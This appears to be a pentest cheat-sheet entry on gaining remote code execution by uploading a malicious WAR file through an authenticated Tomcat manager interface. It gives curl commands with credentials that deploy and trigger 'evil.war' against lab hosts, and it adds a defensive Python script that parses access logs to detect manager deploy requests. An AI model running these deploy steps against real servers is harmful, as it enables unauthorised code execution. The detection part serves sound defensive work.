Uploading malicious JAR or WAR file

devops, tomcat, java, rce, foothold

Overview #

An attacker who can authenticate to the Tomcat manager interface can deploy a malicious JAR or WAR file to gain RCE.

Versions Tested #

Steps - CLI #

curl -u 'webdev:password123' --upload-file evil.war 'http://10.10.163.51:8080/manager/text/deploy?path=/evil.war'
curl -u 'webdev:password123' 'http://10.10.163.51:8080/manager/text/list'
curl -u 'webdev:password123' http://10.10.163.51:8080/evil.war
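From the defender's side, the deploy/list sequence above leaves a distinctive trail in the Tomcat access log: PUT requests to the manager text interface with a `path=` query parameter, followed by requests to the newly deployed context. The following Python script is an added example (not part of the original note) that parses access-log lines in Tomcat's default "common" format, flags manager-interface requests, and reports which contexts were deployed and by whom. The log lines are constructed samples; the host, user and context names mirror the note and are not real observations.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Tomcat's default "common" access log format.
# The IPs, user and context name are illustrative, not real observations.
SAMPLE_LOG = """\
10.10.14.5 - webdev [12/Mar/2024:10:15:01 +0000] "PUT /manager/text/deploy?path=/evil.war HTTP/1.1" 200 52
10.10.14.5 - webdev [12/Mar/2024:10:15:02 +0000] "GET /manager/text/list HTTP/1.1" 200 210
10.10.14.5 - - [12/Mar/2024:10:15:05 +0000] "GET /evil/ HTTP/1.1" 200 1024
192.168.1.20 - - [12/Mar/2024:10:16:00 +0000] "GET /index.html HTTP/1.1" 200 3456
10.10.14.5 - webdev [12/Mar/2024:10:17:00 +0000] "PUT /manager/text/deploy?path=/evil.war HTTP/1.1" 401 0
"""

# Common log format: host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Both the scriptable text interface and the HTML GUI expose deploy/undeploy.
MANAGER_PREFIXES = ("/manager/text/", "/manager/html/")
DEPLOY_ENDPOINTS = ("deploy", "undeploy")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def manager_events(log_text):
    """All requests that touched the Tomcat manager application, parsed."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].startswith(MANAGER_PREFIXES):
            events.append(rec)
    return events


def deployed_contexts(log_text):
    """Context paths from deploy requests that the server accepted (2xx).

    Note: the text interface answers 200 even when the body says FAIL, so a 2xx
    here means 'reached the servlet with valid credentials', not 'deployed'.
    Correlate with the GET to the new context (see SAMPLE_LOG) or with
    catalina.out to confirm.
    """
    contexts = []
    for rec in manager_events(log_text):
        parts = urlsplit(rec["path"])
        endpoint = parts.path.rsplit("/", 1)[-1]
        if endpoint in DEPLOY_ENDPOINTS and 200 <= rec["status"] < 300:
            target = parse_qs(parts.query).get("path", ["<none>"])[0]
            contexts.append(target)
    return contexts


def manager_activity_by_ip(log_text):
    """Count manager-interface requests per source IP, for quick triage."""
    return Counter(rec["ip"] for rec in manager_events(log_text))


if __name__ == "__main__":
    for rec in manager_events(SAMPLE_LOG):
        print(f'{rec["ts"]} {rec["ip"]} user={rec["user"]} '
              f'{rec["method"]} {rec["path"]} -> {rec["status"]}')
    print("deploy targets accepted:", deployed_contexts(SAMPLE_LOG))
    print("manager requests per IP:", dict(manager_activity_by_ip(SAMPLE_LOG)))
```

Run it against a real `localhost_access_log.*.txt` by replacing `SAMPLE_LOG` with the file contents; any PUT to `/manager/text/deploy` from an address that is not your CI/CD host is worth an immediate look, and the 401 in the sample shows why failed attempts should be alerted on as well as successes.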

Steps - GUI #

curl -u 'bob:bubbles' http://thm:1234/evil

Alternatives #